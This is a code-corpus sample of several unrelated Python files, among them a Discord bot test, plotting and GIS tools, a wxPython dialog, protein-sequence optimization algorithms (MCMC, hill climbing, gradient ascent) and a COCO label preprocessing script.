async def test_tvtropes():
    await message("^tvtropes ImprovisedGolems")
    verify_message()
    await message("^tvtropes Sugar/GeniusProgramming")
    # equals=False: presumably asserts the reply does NOT equal the
    # not-found message, i.e. the page was resolved — confirm dpytest semantics.
    verify_message("That trope or media page appears to not exist", equals=False)
| StarcoderdataPython |
1947204 | from typing import Dict, List
from numpy import ndarray, zeros
import plotly.graph_objects as go
from bayesian_mmm.spend_transformation.spend_transformation import (
compute_hill,
compute_reach
)
class DiminushingReturnsVisualizor:
    """Plots spend vs. transformed-spend (diminishing-returns) curves per media.

    The saturation transform is picked from the fitted parameter names:
    an "ec" key selects the Hill transform, otherwise Reach is used.
    """

    def __init__(self, param_nm_to_val: Dict, media_nms: List[str]) -> None:
        # param_nm_to_val presumably maps parameter name -> per-media array
        # of fitted values — confirm against the sampler output.
        if "ec" in param_nm_to_val.keys():
            self.__transfo_func = compute_hill
            self.__transfo_params = {
                "ecs":param_nm_to_val["ec"],
                "slopes":param_nm_to_val["slope"]
            }
        else:
            self.__transfo_func = compute_reach
            self.__transfo_params = {"half_saturations":param_nm_to_val["half_saturation"]}
        self.__media_nms = media_nms

    def write_fig(self, spends: ndarray, name: str) -> None:
        """Write an HTML line plot (one trace per media) to results/plot/.

        spends: (n_obs, n_media) raw spend matrix; column order must match
        the media_nms passed at construction.
        """
        transformed_spends = self.__transfo_func(spends, **self.__transfo_params)
        fig = go.Figure()
        for media_index, media_nm in enumerate(self.__media_nms):
            # Pair raw and transformed spend, sorted by raw spend so the
            # line is drawn monotonically along the x axis.
            trace_data = zeros((spends.shape[0], 2))
            trace_data[:,0] = spends[:,media_index]
            trace_data[:,1] = transformed_spends[:,media_index]
            trace_data = trace_data[trace_data[:,0].argsort()]
            fig.add_trace(
                go.Scatter(
                    x = trace_data[:,0],
                    y = trace_data[:,1],
                    name = media_nm
                )
            )
        fig.write_html("results/plot/diminushing_returns_%s.html" % name, auto_open=False)
8126783 | <filename>ProjectInfo/tools/FeaturesToPoint.py
'''-------------------------------------------------------------------------------
Tool Name: FeaturesToPoint
Source Name: FeaturesToPoint.py
Version: ArcGIS 10.1
License: Apache 2.0
Author: <NAME>
Updated by: <NAME>
Description: Description: Creates a Points Features of true centroid from feature layer.
History: Initial coding - 16/09/2018, version 1.0
Updated:
-------------------------------------------------------------------------------'''
import arcpy
class FeaturesToPoint(object):
    """ArcGIS geoprocessing tool: derive centroid points from a feature layer
    and spatial-join the source attributes onto them."""

    def __init__(self):
        """Define the tool (tool name is the name of the class)."""
        self.label = "Features To Point"
        self.description = "Creates a Points Features of true centroid from feature layer."
        self.canRunInBackground = False
        self.category = "Data Management"

    def getParameterInfo(self):
        """Define parameter definitions"""
        # Input feature layer to derive points from.
        param0 = arcpy.Parameter(name="in_layer",
                                 displayName="Feature Layer",
                                 direction="Input",
                                 parameterType="Required",
                                 datatype="GPFeatureLayer")
        # Output point feature layer.
        param1 = arcpy.Parameter(name="out_layer",
                                 displayName="Output Layer",
                                 direction="Output",
                                 parameterType="Required",
                                 datatype="GPFeatureLayer")
        params = [param0, param1]
        return params

    def isLicensed(self):
        """Set whether tool is licensed to execute."""
        return True

    def updateParameters(self, parameters):
        """Modify the values and properties of parameters before internal
        validation is performed. This method is called whenever a parameter
        has been changed."""
        return

    def updateMessages(self, parameters):
        """Modify the messages created by internal validation for each tool
        parameter. This method is called after internal validation."""
        return

    def execute(self, parameters, messages):
        """The source code of the tool."""
        in_layer = parameters[0].valueAsText
        out_layer = parameters[1].valueAsText
        # Copy the input into in-memory geometry objects.
        geometries_list = arcpy.CopyFeatures_management(in_layer, arcpy.Geometry())
        # NOTE(review): .centroid may fall back to the label point when the
        # true centroid is outside the feature; use .trueCentroid if the
        # description's "true centroid" is the actual requirement.
        result_geometry = [arcpy.PointGeometry(polygon.centroid) for polygon in geometries_list]
        # Attach the source attributes back onto the points.
        return arcpy.SpatialJoin_analysis(result_geometry, in_layer, out_layer)
| StarcoderdataPython |
175681 | <filename>img_upload/config.py
import os
# AWS S3 configuration — fill in the bucket name and credentials before use.
S3_BUCKET = ""
S3_KEY = ""
S3_SECRET = ""
# Public base URL of the bucket, derived from the bucket name.
S3_LOCATION = f"http://{S3_BUCKET}.s3.amazonaws.com/"

# Flask app settings.
DEBUG = True
PORT = 5000
11374963 | <reponame>alvarosanz/loadit
import wx
import os
from loadit.misc import humansize
from loadit.gui.table_info_dialog import TableInfoDialog
class DatabaseInfoDialog(wx.Dialog):
    """Modal dialog summarising a loadit database.

    Shows general metadata (name, size, last batch date/hash, version) and a
    notebook with three tabs: Tables, Batches and Attachments. Right-clicking
    a table row opens a context menu with a "Show Info" entry.
    """

    def __init__(self, parent, database, active_tab=0):
        """Build the dialog.

        :param parent: parent wx window.
        :param database: database object; only ``path`` and ``header``
            (tables / batches / attachments metadata) are read here.
        :param active_tab: index of the initially selected notebook tab
            (0 = Tables, 1 = Batches, 2 = Attachments).
        """
        super().__init__(parent)
        self.database = database
        self.SetTitle('Database Info')
        self.SetSize((640, 480))
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(-1, 8)  # top spacer
        # General info
        field_sizer = wx.BoxSizer(wx.HORIZONTAL)
        field_sizer.Add(wx.StaticText(self, label='Name:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
        field_sizer.Add(wx.TextCtrl(self, value=os.path.basename(database.path), style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
        sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
        field_sizer = wx.BoxSizer(wx.HORIZONTAL)
        field_sizer.Add(wx.StaticText(self, label='Size:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
        field_sizer.Add(wx.TextCtrl(self, value=humansize(database.header.nbytes), style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
        sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
        # Date and hash of the most recent batch (only when batches exist).
        # NOTE(review): a batch record appears to be a 5-tuple
        # (name, hash, date, ?, comment) — confirm against the header format.
        if database.header.batches:
            field_sizer = wx.BoxSizer(wx.HORIZONTAL)
            field_sizer.Add(wx.StaticText(self, label='Date:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
            field_sizer.Add(wx.TextCtrl(self, value=database.header.batches[-1][2], style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
            sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
            field_sizer = wx.BoxSizer(wx.HORIZONTAL)
            field_sizer.Add(wx.StaticText(self, label='Hash:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
            field_sizer.Add(wx.TextCtrl(self, value=database.header.batches[-1][1], style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
            sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
        field_sizer = wx.BoxSizer(wx.HORIZONTAL)
        field_sizer.Add(wx.StaticText(self, label='Version:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
        field_sizer.Add(wx.TextCtrl(self, value=database.header.version, style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
        sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
        sizer.Add(-1, 8)
        notebook = wx.Notebook(self)
        # Tables tab: one row per table with size / field / ID / LID counts.
        panel = wx.Panel(notebook, id=wx.ID_ANY)
        panel_sizer = wx.BoxSizer(wx.VERTICAL)
        self.tables = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
        self.tables.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.show_menu)
        self.tables.InsertColumn(0, 'Table', width=250)
        self.tables.InsertColumn(1, 'Size', width=100)
        self.tables.InsertColumn(2, 'Fields', width=50)
        self.tables.InsertColumn(3, 'IDs', width=80)
        self.tables.InsertColumn(4, 'LIDs', width=80)
        for i, table in enumerate(database.header.tables.values()):
            self.tables.InsertItem(i, table['name'])
            self.tables.SetItem(i, 1, humansize(database.header.get_size(table['name'])))
            # first two columns are skipped when counting data fields
            self.tables.SetItem(i, 2, str(len(table['columns'][2:])))
            self.tables.SetItem(i, 3, str(len(table['IDs'])))
            self.tables.SetItem(i, 4, str(len(table['LIDs'])))
        panel_sizer.Add(self.tables, 1, wx.ALL + wx.EXPAND, 5)
        panel.SetSizer(panel_sizer)
        notebook.AddPage(panel, 'Tables ({})'.format(len(database.header.tables)))
        # Batches tab: one row per stored batch.
        panel = wx.Panel(notebook, id=wx.ID_ANY)
        panel_sizer = wx.BoxSizer(wx.VERTICAL)
        self.batches = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
        self.batches.InsertColumn(0, 'Batch', width=250)
        self.batches.InsertColumn(1, 'Size', width=100)
        self.batches.InsertColumn(2, 'Date', width=170)
        self.batches.InsertColumn(3, 'Hash', width=80)
        self.batches.InsertColumn(4, 'Comment', width=400)
        for i, (batch, batch_hash, date, _, comment) in enumerate(database.header.batches):
            self.batches.InsertItem(i, batch)
            self.batches.SetItem(i, 1, humansize(database.header.get_batch_size(batch)))
            self.batches.SetItem(i, 2, date)
            self.batches.SetItem(i, 3, batch_hash)
            self.batches.SetItem(i, 4, comment)
        panel_sizer.Add(self.batches, 1, wx.ALL + wx.EXPAND, 5)
        panel.SetSizer(panel_sizer)
        notebook.AddPage(panel, 'Batches ({})'.format(len(database.header.batches)))
        # Attachments tab: attachment name and size.
        panel = wx.Panel(notebook, id=wx.ID_ANY)
        panel_sizer = wx.BoxSizer(wx.VERTICAL)
        self.attachments = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
        self.attachments.InsertColumn(0, 'Attachment', width=250)
        self.attachments.InsertColumn(1, 'Size', width=100)
        for i, (attachment, (_, nbytes)) in enumerate(database.header.attachments.items()):
            self.attachments.InsertItem(i, attachment)
            self.attachments.SetItem(i, 1, humansize(nbytes))
        panel_sizer.Add(self.attachments, 1, wx.ALL + wx.EXPAND, 5)
        panel.SetSizer(panel_sizer)
        notebook.AddPage(panel, 'Attachments ({})'.format(len(database.header.attachments)))
        notebook.ChangeSelection(active_tab)
        sizer.Add(notebook, 1, wx.ALL + wx.EXPAND, 5)
        self.SetSizer(sizer)

    def show_menu(self, event):
        """Show the right-click context menu for the tables list."""
        popupmenu = wx.Menu()
        menu_item = popupmenu.Append(wx.ID_ANY, 'Show Info')
        self.tables.Bind(wx.EVT_MENU, self.table_info, menu_item)
        self.tables.PopupMenu(popupmenu, event.GetPoint())

    def table_info(self, event):
        """Open a TableInfoDialog for the currently focused table row."""
        with TableInfoDialog(self, self.database.header.tables[self.tables.GetItemText(self.tables.GetFocusedItem())], self.database) as dialog:
            dialog.ShowModal()
3560673 | <gh_stars>0
from card import Card
class Player:
    """A named participant holding a single card."""

    # declared attributes
    name: str
    card: Card

    def __init__(self, name, card):
        """Remember the player's name and the card they were dealt."""
        self.name = name
        self.card = card
| StarcoderdataPython |
3306669 | <reponame>ec1340/ReLSO-Guided-Generative-Protein-Design-using-Regularized-Transformers<filename>relso/optim/optim_algs.py
"""
Optimization algorithms
"""
import numpy as np
import numpy.ma as ma
import numpy.linalg as LA
import copy
from tqdm import tqdm
from scipy.spatial import distance
from sklearn.neighbors import NearestNeighbors
import torch
import torch.nn as nn
"""
def grad_free_optimizer(initial_sequence, oracle, N):
...
optimization step
...
return opm
"""
######################
# Gradient Free Methods
######################
def eval_oracle(data_point, oracle):
    """Score one embedding with the fitness oracle.

    Wraps the raw point in a (1, D) tensor, evaluates the oracle without
    gradient tracking, and returns the prediction as a Python float.
    """
    batch = torch.Tensor(data_point).reshape(1, -1)
    with torch.no_grad():
        prediction = oracle(batch)
    return prediction.squeeze().item()
######################
# Directed Evolution
######################
def directed_evolution_sequence(initial_sequence, model, positions):
    """Greedy directed evolution over a discrete sequence.

    from https://www.pnas.org/content/pnas/116/18/8852.full.pdf
    traditional directed evolution by greedy walk:
      1. saturation mutagenesis at a single position
      2. fix the optimal mutation
      3. repeat for all positions

    :param initial_sequence: 1-D numpy array of residue indices (length N).
    :param model: callable where ``model(batch)[0][-1]`` yields the fitness
        prediction for the batch (matches how it is indexed below).
    :param positions: iterable of positions to optimize, in order.
    :returns: (cand_traj, fit_traj) — the candidate sequence after each
        position sweep (len(positions)+1 x N, row 0 = input) and the
        corresponding fitness values.
    """
    cand_seq = torch.from_numpy(initial_sequence).unsqueeze(0)
    with torch.no_grad():
        initial_fit = model(cand_seq)[0][-1]
    # row 0 of each trajectory holds the starting point
    cand_traj = np.zeros((len(positions) + 1, len(initial_sequence)))
    fit_traj = np.zeros((len(positions) + 1))
    cand_traj[0] = cand_seq.reshape(-1).numpy()
    fit_traj[0] = initial_fit
    for indx, pos in enumerate(tqdm(positions)):
        # create full expansion at position: 22 copies, one per token
        # (presumably 20 amino acids + 2 special tokens — TODO confirm)
        cand_seqs = cand_seq.repeat(22, 1)
        cand_seqs[:, pos] = torch.arange(22)
        # screen expansion without building a graph
        with torch.no_grad():
            cand_seqs_fit = model(cand_seqs)[0][-1]
        # keep the single best substitution at this position
        max_fit_aa_indx = cand_seqs_fit.argmax(0)
        max_fit = cand_seqs_fit.max()
        cand_seq = cand_seqs[max_fit_aa_indx]
        cand_traj[indx + 1] = cand_seq.reshape(-1).numpy()
        fit_traj[indx + 1] = max_fit.numpy()
    return cand_traj, fit_traj
############################
# MCMC
############################
# Sequence Level
# -------------------------
def model_predict(sequence, model):
    """Return the model's scalar fitness prediction for one sequence.

    Accepts either a numpy array or a torch tensor of residue indices;
    the sequence is reshaped to a single-row batch before evaluation.
    """
    model = model.eval()
    if isinstance(sequence, np.ndarray):
        sequence = torch.from_numpy(sequence)
    batch = sequence.reshape(1, -1)
    with torch.no_grad():
        prediction = model(batch)[0][-1]
    return prediction.numpy().squeeze()
def mutate_sequence(sequence, num_mutations):
    """Return a copy of ``sequence`` with up to ``num_mutations`` substitutions.

    Positions are drawn with replacement; a drawn position holding the
    padding token (21) is reported and skipped. The substitution is always
    different from the residue currently at that position. The input array
    is left untouched.
    """
    mutated = sequence.copy()
    alphabet = np.arange(22)
    # sample all target positions up front (with replacement)
    chosen_positions = np.random.choice(np.arange(len(mutated)), num_mutations)
    for position in chosen_positions:
        current_aa = mutated[position]
        if current_aa == 21:
            print('mutation in padding region - ignoring')
            continue
        # mask out the current residue so the draw always changes the site
        masked = np.ma.masked_where(alphabet == current_aa, alphabet)
        mutated[position] = np.random.choice(alphabet[~masked.mask], 1)
    return mutated
def acceptance_step(curr_fit, prop_fit, T):
    """Metropolis accept/reject decision.

    Uphill moves (prop_fit > curr_fit) are accepted with probability 1;
    downhill moves with probability exp((prop_fit - curr_fit) / T).

    :param curr_fit: fitness of the current state.
    :param prop_fit: fitness of the proposed state.
    :param T: temperature; larger T accepts worse moves more often.
    :returns: bool — True when the proposal should be accepted.
    """
    out_dict = {0: False, 1: True}
    # acceptance probability; may overflow to inf for big uphill moves,
    # which min(1, prob) below clamps back to 1
    prob = np.exp(((prop_fit - curr_fit) / T))
    # BUG FIX: the original tested `prob == np.nan`, which is always False
    # (NaN never compares equal), so a NaN probability crashed
    # np.random.binomial. Detect NaN properly and reject the move.
    if np.isnan(prob):
        outcome = 0
    else:
        prob = min(1, prob)
        outcome = np.random.binomial(1, prob)
    return out_dict[outcome]
def get_l1_norm(seq1, seq2):
    """Distance between two index-encoded sequences via one-hot encoding.

    Note: numpy's ord=1 norm of a 2-D array is the induced 1-norm
    (maximum absolute column sum), not an element-wise L1 sum.
    """
    one_hot_a = np.eye(22)[seq1.squeeze()]
    one_hot_b = np.eye(22)[seq2.squeeze()]
    return LA.norm(one_hot_a - one_hot_b, 1)
def metropolisMCMC_sequence(initial_sequence, model, T=0.01, mu=1, trust_radius=15,
                            N_steps=20):
    """Metropolis MCMC over discrete sequences.

    from pg 24 of low-N
    https://www.biorxiv.org/content/10.1101/2020.01.23.917682v2.full.pdf

    Each step proposes Poisson(mu) random substitutions; proposals farther
    than ``trust_radius`` (one-hot norm, see ``get_l1_norm``) from the
    current sequence are rejected outright, otherwise a Metropolis
    accept/reject at temperature T is applied on the model's predicted
    fitness.

    :returns: (cand_traj, fit_traj) — sequence visited at every step
        (N_steps x L, row 0 = start) and the matching fitness values.
    """
    # start at initial sequence
    # NOTE(review): .numpy() implies the input is a torch tensor — confirm.
    curr_seq = initial_sequence.numpy()
    curr_fit = model_predict(curr_seq, model)
    # trajectory buffers; row 0 holds the starting point
    cand_traj = np.zeros((N_steps, len(initial_sequence)))
    fit_traj = np.zeros((N_steps))
    cand_traj[0] = curr_seq.reshape(-1)
    fit_traj[0] = curr_fit
    # optimization loop
    for step_indx in tqdm(range(1, N_steps)):
        num_mut = np.random.poisson(mu)
        # produce candidate
        prop_seq = mutate_sequence(curr_seq, num_mut)
        # selection step: only consider proposals inside the trust radius
        if get_l1_norm(prop_seq, curr_seq) < trust_radius:  # mut radius
            prop_fit = model_predict(prop_seq, model)
            if acceptance_step(curr_fit, prop_fit, T):
                curr_seq = prop_seq.copy()
                curr_fit = prop_fit.copy()
        # logging: the current state is recorded even when nothing changed
        cand_traj[step_indx] = curr_seq.reshape(-1)
        fit_traj[step_indx] = curr_fit
    return cand_traj, fit_traj
# Latent space
# -------------------------
def metropolisMCMC_embedding(initial_embedding, oracle,
                             T=0.01, delta=0.1, N_steps=1000):
    """Metropolis MCMC directly in the continuous latent space.

    Proposals are isotropic Gaussian perturbations (scale ``delta``) of the
    current embedding; acceptance follows ``acceptance_step`` at
    temperature T, with fitness given by the oracle.

    Returns the embedding trajectory (N_steps x D) and the fitness history.
    """
    embed_dim = initial_embedding.shape[-1]
    current = initial_embedding.reshape(1, embed_dim)
    current_fit = eval_oracle(current, oracle)
    print("starting fitness: {}".format(current_fit))
    fit_history = [current_fit]
    trajectory = np.zeros((N_steps, embed_dim))
    trajectory[0] = current
    for step in tqdm(range(1, N_steps)):
        # Gaussian random-walk proposal
        proposal = current + delta * np.random.randn(embed_dim)
        proposal_fit = eval_oracle(proposal, oracle)
        if acceptance_step(current_fit, proposal_fit, T):
            current, current_fit = proposal, proposal_fit
        # record the (possibly unchanged) state at every step
        fit_history.append(current_fit)
        trajectory[step] = current
    return trajectory, np.array(fit_history)
def model_cycle(embedding, model):
    """Project an embedding onto the model's decodable manifold.

    Decodes the embedding to its argmax sequence and re-encodes that
    sequence, returning the re-embedded point as a numpy array.
    """
    with torch.no_grad():
        z = torch.from_numpy(embedding).float().reshape(1, -1)
        decoded = model.decode(z).argmax(1)
        return model.encode(decoded).numpy()
def metropolisMCMC_embedding_cycle(initial_embedding, oracle, model,
                                   T=0.01, delta=0.05, N_steps=1000, perturbation=True):
    """Latent-space Metropolis MCMC with a decode/encode "cycle" step.

    Like ``metropolisMCMC_embedding`` but every proposal is projected back
    onto the model's decodable manifold via ``model_cycle`` (decode to a
    sequence, re-encode). When ``perturbation`` is False no random step is
    taken and only the cycle projection is applied each iteration.

    :returns: (embedding trajectory of shape (N_steps, D), fitness history).
    """
    embed_dim = initial_embedding.shape[-1]
    # start at initial sequence
    curr_embedding = initial_embedding.reshape(1, embed_dim)
    curr_fit = eval_oracle(curr_embedding, oracle)
    print("starting fitness: {}".format(curr_fit))
    fitness_list = [curr_fit]
    out_embedding_array = np.zeros((N_steps, embed_dim))
    out_embedding_array[0] = curr_embedding
    # optimization loop
    for indx in tqdm(range(1, N_steps)):
        # perturbation step: Gaussian jitter then manifold projection,
        # or projection alone when perturbation is disabled
        if perturbation:
            prop_embedding = curr_embedding + delta * np.random.randn(embed_dim)
            prop_embedding = model_cycle(prop_embedding, model)
        else:
            prop_embedding = model_cycle(curr_embedding, model)
        prop_fit = eval_oracle(prop_embedding, oracle)
        if acceptance_step(curr_fit, prop_fit, T):
            curr_embedding = prop_embedding
            curr_fit = prop_fit
        # logging: current state recorded every step
        fitness_list.append(curr_fit)
        out_embedding_array[indx] = curr_embedding
    return out_embedding_array, np.array(fitness_list)
############################
# Hill Climbing
############################
def get_knn_directions(dataset, current_point, k):
    """Return the k rows of ``dataset`` closest (Euclidean) to ``current_point``."""
    dists = distance.cdist(current_point.reshape(1, -1), dataset).ravel()
    nearest_indices = np.argsort(dists)[:k]
    return [dataset[i] for i in nearest_indices]
def get_steepest_neighbor(neighbors, oracle):
    """Score every candidate with the oracle; return the best one and its fitness."""
    scores = np.array([eval_oracle(candidate, oracle) for candidate in neighbors])
    best_index = scores.argmax()
    return neighbors[best_index], scores.max()
def get_stochastic_steepest_neighbor(neighbors, oracle, curr_fit):
    """Pick a random neighbor that improves on ``curr_fit``.

    When no candidate improves, falls back to a uniformly random neighbor.
    Returns (chosen neighbor, its fitness).
    """
    scores = np.array([eval_oracle(candidate, oracle) for candidate in neighbors])
    indices = np.arange(len(scores))
    uphill = indices[scores > curr_fit]
    # choose among improving neighbors when any exist, otherwise anywhere
    pool = indices if len(uphill) == 0 else uphill
    pick = np.random.choice(pool, 1)[0]
    return neighbors[pick], scores[pick]
def nn_hill_climbing_embedding(initial_embedding, oracle, dataset_embeddings,
                               step_interp=0.5, k_neighbors=30, N_steps=1000, stochastic=False):
    """Hill climbing in latent space, restricted to dataset directions.

    At each step the ``k_neighbors`` nearest dataset embeddings are scored
    with the oracle; the current point then moves fraction ``step_interp``
    of the way toward the steepest (or, when ``stochastic`` is True, a
    randomly chosen improving) neighbor.

    :returns: (embedding trajectory of shape (N_steps, D), fitness history).

    NOTE(review): ``curr_embedding`` is a reshaped view of
    ``initial_embedding`` and is updated in place with ``+=`` below, so the
    caller's array may be mutated — confirm this is intended.
    """
    embed_dim = initial_embedding.shape[-1]
    curr_embedding = initial_embedding.reshape(1, embed_dim)
    curr_fit = eval_oracle(curr_embedding, oracle)
    print("starting fitness: {}".format(curr_fit))
    fitness_list = [curr_fit]
    out_embedding_array = np.zeros((N_steps, embed_dim))
    out_embedding_array[0] = curr_embedding
    for indx in tqdm(range(1, N_steps)):
        # search step: restrict candidate directions to nearby dataset points
        k_directions = get_knn_directions(dataset_embeddings, curr_embedding, k_neighbors)
        if stochastic:
            next_neighbor, next_fitness = get_stochastic_steepest_neighbor(k_directions, oracle, curr_fit)
        else:
            next_neighbor, next_fitness = get_steepest_neighbor(k_directions, oracle)
        next_direction = next_neighbor - curr_embedding
        # update step: partial move toward the chosen neighbor (in place)
        curr_embedding += step_interp * next_direction
        # NOTE(review): records the neighbor's fitness, not the fitness of
        # the interpolated point actually reached — confirm intended.
        curr_fit = next_fitness
        # logging
        out_embedding_array[indx] = curr_embedding
        fitness_list.append(curr_fit)
    return out_embedding_array, np.array(fitness_list)
############################
# Gradient Methods
############################
# TODO: convert to py class
def grad_ascent(initial_embedding, train_embeddings,
                train_data, model, N_steps, lr, cycle=False):
    """Gradient ascent on the model's predicted fitness in latent space.

    Repeatedly takes a step of size ``lr`` along d(fitness)/d(embedding).
    With ``cycle=True`` the embedding is additionally projected through the
    model's decoder/encoder each step.

    NOTE(review): ``train_embeddings`` and ``train_data`` are unused here —
    confirm whether they can be dropped from the signature's callers.

    :returns: (embedding trajectory (N_steps, D), fitness trajectory,
        list of detached gradient tensors, one per step).
    """
    # need to pass the sequence through the network layers for the gradient
    # to be taken, so cycle the embedding once
    model.requires_grad_(True)
    grad_list = []
    # data logging buffers
    embed_dim = initial_embedding.shape[-1]
    out_embedding_array = np.zeros((N_steps, embed_dim))
    out_fit_array = np.zeros((N_steps))
    # initial step: leaf tensor that tracks gradients
    curr_embedding = torch.tensor(initial_embedding, requires_grad=True).reshape(-1, embed_dim)
    curr_fit = model.regressor_module(curr_embedding)
    print("starting fitness: {}".format(curr_fit))
    # save step 0 info
    out_embedding_array[0] = curr_embedding.reshape(1, embed_dim).detach().numpy()
    out_fit_array[0] = curr_fit.detach().numpy()
    assert curr_embedding.requires_grad
    for step in tqdm(range(1, N_steps)):
        model.train()
        grad = torch.autograd.grad(curr_fit, curr_embedding)[0]  # get gradient
        grad_list.append(grad.detach())
        # update step
        update_step = grad * lr
        # NOTE(review): in-place `+=` on a leaf tensor that requires grad
        # raises a RuntimeError in recent PyTorch versions — confirm the
        # supported torch version, or use a no_grad()/.data update.
        curr_embedding += update_step
        # cycle bool: optionally project through decoder/encoder
        model = model.eval()
        if cycle:
            nseq = model.decode(curr_embedding).argmax(1)
            curr_embedding = model.encode(nseq)
        curr_fit = model.regressor_module(curr_embedding)
        # save step i info
        # NOTE(review): assigning a grad-tracking tensor into a numpy array
        # may require .detach() first — confirm.
        out_embedding_array[step] = curr_embedding
        out_fit_array[step] = curr_fit.detach().numpy()
    return out_embedding_array, out_fit_array, grad_list
| StarcoderdataPython |
6510551 | <gh_stars>1-10
# coding: utf-8
from pycocotools.coco import COCO
import argparse
import numpy as np
import skimage.io as io
import matplotlib.pyplot as plt
import pylab
import os, os.path
import pickle
from tqdm import tqdm
# Command-line interface: dataset location, output directory, and which
# partition(s) to process.
parser = argparse.ArgumentParser(description="Preprocess COCO Labels.")
#dataDir='/share/data/vision-greg/coco'
#which dataset to extract options are [all, train, val, test]
#dataset = "all"
# NOTE(review): `default` on a required positional argument has no effect
# (argparse ignores it unless nargs='?') — confirm "dir" should be optional.
parser.add_argument("dir", type=str, default="../datasets/coco/",
                    help="where is the coco dataset located.")
parser.add_argument("--save_dir", type=str, default="./datasets/coco/",
                    help="where to save the coco labels.")
parser.add_argument("-d", "--dataset", type=str, default="all",
                    choices=["all", "train", "val", "test"],
                    help="which coco partition to create the multilabel set"
                    "for the options [all, train, val, test] default is all")
args = parser.parse_args()
def save_obj(obj, name):
    """Pickle ``obj`` to ``<name>.pkl`` using the highest protocol."""
    with open(name + '.pkl', 'wb') as handle:
        pickle.dump(obj, handle, pickle.HIGHEST_PROTOCOL)
def load_obj(name):
    """Unpickle and return the object stored at ``<name>.pkl``."""
    with open(name + '.pkl', 'rb') as handle:
        return pickle.load(handle)
def wrrite(fname, d):
    """Write the entries of ``d`` to ``fname``, one per line.

    ``d`` may be a list of strings or a dict keyed 0..len(d)-1 (both are
    indexed by position below, which is why plain iteration is not used).
    """
    # use a context manager so the file is closed even if a write fails
    # (the original left the handle open on exceptions)
    with open(fname, 'w') as fout:
        for i in range(len(d)):
            fout.write(d[i] + '\n')
def load(fname):
    """Parse an index file of ``"<path> <label>"`` lines.

    :param fname: path to a whitespace-separated two-column text file.
    :returns: (list of path strings, int32 numpy array of labels).
    """
    data = []
    labels = []
    # context manager fixes the original's leaked file handle; iterating
    # the file directly avoids materializing readlines()
    with open(fname) as fin:
        for line in fin:
            l = line.strip().split(' ')
            data.append(l[0])
            labels.append(int(l[1]))
    return data, np.array(labels, dtype=np.int32)
def load_labels(img_names, root_dir, dataset, coco, idmapper):
    """Build a multi-label dict {image path: unique category indices}.

    :param img_names: image file names inside ``root_dir``.
    :param root_dir: directory the names are joined with for the dict keys.
    :param dataset: "val" or "train" — selects the filename slice below.
    :param coco: pycocotools COCO handle for the matching annotation file.
    :param idmapper: sparse COCO category id -> contiguous index map.
    :returns: dict mapping full image path to a sorted unique array of
        category indices; images without annotations map to array([-1]).
    """
    labels = {}
    for i in tqdm(range(len(img_names))):
        # Hack to extract the image id from the image name
        # (assumes names like "COCO_val2014_<12-digit id>.jpg" /
        # "COCO_train2014_<id>.jpg" — TODO confirm for other layouts)
        if dataset == "val":
            imgIds = int(img_names[i][18:-4])
        else:
            imgIds = int(img_names[i][19:-4])
        annIds = coco.getAnnIds(imgIds=imgIds, iscrowd=None)
        anns = coco.loadAnns(annIds)
        c = []
        for annot in anns:
            c.append(idmapper[annot['category_id']])
        if not c:
            # sentinel for images with no annotations
            c = np.array(-1)
        labels[root_dir + '/' + img_names[i]] = np.unique(c)
    return labels
def load_image_names(root_dir):
    """Return the names of all regular files directly inside ``root_dir``."""
    return [entry for entry in os.listdir(root_dir)
            if os.path.isfile(os.path.join(root_dir, entry))]
def load_annotations(dataDir, dataType):
    """Open the COCO instance annotations for one partition.

    :param dataDir: dataset root directory.
    :param dataType: partition name, e.g. "train2014" or "val2014".
    :returns: (coco, idmapper) — the COCO API handle and a dict mapping the
        sparse COCO category ids onto contiguous indices 0..N-1.
    """
    annFile = '%s/annotations/instances_%s.json' % (dataDir, dataType)
    # initialize COCO api for instance annotations
    coco = COCO(annFile)
    category_ids = [cat['id'] for cat in coco.loadCats(coco.getCatIds())]
    idmapper = {cat_id: index for index, cat_id in enumerate(category_ids)}
    return coco, idmapper
# ---------------------------------------------------------------------------
# Script body: build the multi-label dictionaries / image lists for the
# requested COCO partition(s). os.path.join is used throughout so args.dir /
# args.save_dir work with or without a trailing slash (the original mixed
# "dir + 'x'" and "dir + '/x'").
# ---------------------------------------------------------------------------
root_dir = os.path.join(args.dir, "train2014")
train_img_names = load_image_names(root_dir)
root_dir = os.path.join(args.dir, "val2014")
val_img_names = load_image_names(root_dir)
if args.dataset == "test" or args.dataset == "all":
    # test split has no annotations: only an image-path list is emitted
    root_dir = os.path.join(args.dir, "test2014")
    test_img_names = load_image_names(root_dir)
    d = {}
    for i in range(len(test_img_names)):
        d[i] = root_dir + '/' + test_img_names[i]
    LIST = os.path.join(args.save_dir, 'test2014imgs.txt')
    wrrite(LIST, d)
if args.dataset == "all":
    root_dir = os.path.join(args.dir, "train2014")
    coco, idmapper = load_annotations(args.dir, "train2014")
    labels = load_labels(train_img_names, root_dir, "train", coco, idmapper)
    save_obj(labels, os.path.join(args.save_dir, "multi-label-train2014"))
